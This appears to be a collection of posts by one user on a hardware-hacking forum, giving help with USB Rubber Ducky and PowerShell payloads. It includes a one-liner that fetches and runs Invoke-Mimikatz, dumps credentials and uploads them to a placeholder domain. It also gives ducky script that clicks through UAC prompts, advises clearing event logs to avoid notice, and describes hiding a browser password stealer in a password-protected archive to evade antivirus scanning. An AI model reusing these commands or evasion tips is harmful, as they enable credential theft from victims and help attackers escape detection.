Enzym3

https://wifipineapple.github.io/wifipineapple-wiki//#!setup.md

According to Darren, yes. Not sure which version of the firmware that would be though.

If my above response wasn't helpful, try adding this line of code before the Net.WebClient line: [System.Net.ServicePointManager]::Expect100Continue = $false http://stackoverflow.com/questions/566437/http-post-returns-error-417-expectation-failed

Is that the EXACT output from the console, or did you edit the URL for privacy before posting? If this is copied straight from your console, then the problem would be: IEX(New-Object Net.WebClient).DownloadString('http://<my domain.com>/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://<my domain.com>/capture.php',$o) You'd need to change the highlighted section to an actual domain which you wish to use. I have a feeling you edited it like that on purpose, but it wouldn't be the first time I've seen someone copy/paste code and run it without noticing it needs to be modified to fit first.

Not that I could find, but you can just as easily pause the video at certain times to copy the code yourself.

I got the same results as you. There are, of course, plenty of payloads that can be ran on a non-administrator level of PowerShell/CMD and certain privilege escalation attacks that can be done, but this does provide a very big deterrent to many of the ducky payloads you see out there right now.

Awesome idea! I'll try to get around to test it out over the weekend if I'm not busy finishing up a work project. If I do, I'll report back with my experience using it. Cheers!

I have not ran into that issue before, but good looking out. I'll keep an eye out for it and make sure to account for it. Good call too on CTRL + C to jump to the next line. Much easier!

I'm certain there's a way to do what you're wanting to do, but it may require too much work or a very specific exploit to actually be viable since most often you want a payload that will work on a broad range of hosts. I wish I had an answer for you, but I just started messing with PowerShell in the past few weeks, so my knowledge is still extremely basic. One other tip I will give you that I quickly learned and don't see any other payloads accounting for is writing payloads that will work both with UAC and without UAC enabled. And by that I mean having your payload press ALT + Y to bypass the UAC prompt while accounting for any hosts that don't prompt for UAC which will end up causing the PowerShell script to begin with a 'y' (since the dialog box doesn't pop up, it ends up typing in the PowerShell window), thus causing an error when the following command is executed. Before you start inserting your first line of code, you need to LEFTARROW and then press DELETE to take care of the leading 'y' first. Therefore, I always write my UAC bypass portion of my payloads like this: <...> STRING powershell Start-Process powershell -Verb runAs ENTER DELAY 300 ALT y DELAY 300 LEFTARROW DELAY 50 DELETE DELAY 50 STRING $usbpath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'QUACK' } | select name <...> Cheers, -Enzym3

Just a tip: You can use the -whatif parameter in PowerShell at the end of any line of code that will make changes to your system to see the result of executing the code without it actually executing. Additionally, you can use -confirm in a similar fashion to be prompted before the changes take effect. This is how I tested your code to see why it wasn't working. I opened two separate PowerShell windows and typed in your code and added the -whatif parameter to the end in each and here's what I got: Non-administrator shell: Adminstrator shell:

You would require running PowerShell in administrator mode in order to execute that code, meaning you'll have to bypass UAC the old fashioned way using ALT + Y for at least the first time you run it on a targeted machine that has UAC enabled. However, it would still be useful if you intend to run multiple payloads that would require bypassing multiple prompts, or any situation where you may not want a user to catch on to things being executed while they're actively using the PC. That being said, a smart user may notice that UAC has been disabled and start sniffing around, so make sure your payloads are clearing the system event logs at the end.

Keep in mind, this is not what I intended to release. This was just a few hours work taking two separate tools already available, heavily gutting and jerry-rigging it just enough that I knew that it would work in concept. Prior to starting this project, I had zero experience in Powershell (besides using it to run common/simple things often used in CMD), so I was teaching myself as I went by tracing the code already there and experimenting. If you see some edit's I've made and it looks sloppy as all hell, or there's multiple lines of code that could easily be a few bits of code, or you see redundant variables/daisy-chained variables, it's probably because I was changing little bits of code around to test and learn, after which I know there is a ton of code cleanup to do as well as removing lots of unnecessary code leftover from separate functions the tool could do for which I didn't have any use. But, if anyone sees any errors that would be a good learning opportunity, I would love to hear what you have to say. I'm a sponge for knowledge and I look forward to slowly tweaking everything and making it efficient and adding a handful of other handy features. TL;DR - I'm brand new as Powershell. It's messy. I'm sorry, but I'm just sharing what I have in hopes other newbies at PS can learn something as well. Hopefully someone finds something useful here, or at least can serve as a springboard for some way cooler shit. Cheers, -Enzym3

Can you post some more info? Such as the payload you're referencing and any other info you can supply? It's hard for anyone to help you out if they don't have all the info they need.

Ah hah! It worked. I had to wrap it into a WinRAR archive so that I could password protect it and encrypt the filenames, and when I tested the download link it actually worked correctly. Download link: https://drive.google.com/open?id=0Bz2WgiBl-P0jMEYzQzBVSkVMVmM The password to access the archive is: quack Cheers, -Enzym3

Ugh. Sorry, fellas. I just got back home and saw all the fuss. I don't know what exactly it was about that ZIP archive that violated Google's TOS, but I've never had that issue before. It's possible that maybe their AV scan flagged the browser password stealer tool or one of the powershell scripts as malicious. I'm not certain. I'll see if I can just re-zip the file and add a password to it and hope that it will allow it to get around their AV scan by not allowing it access. I'll play around with it and figure something out.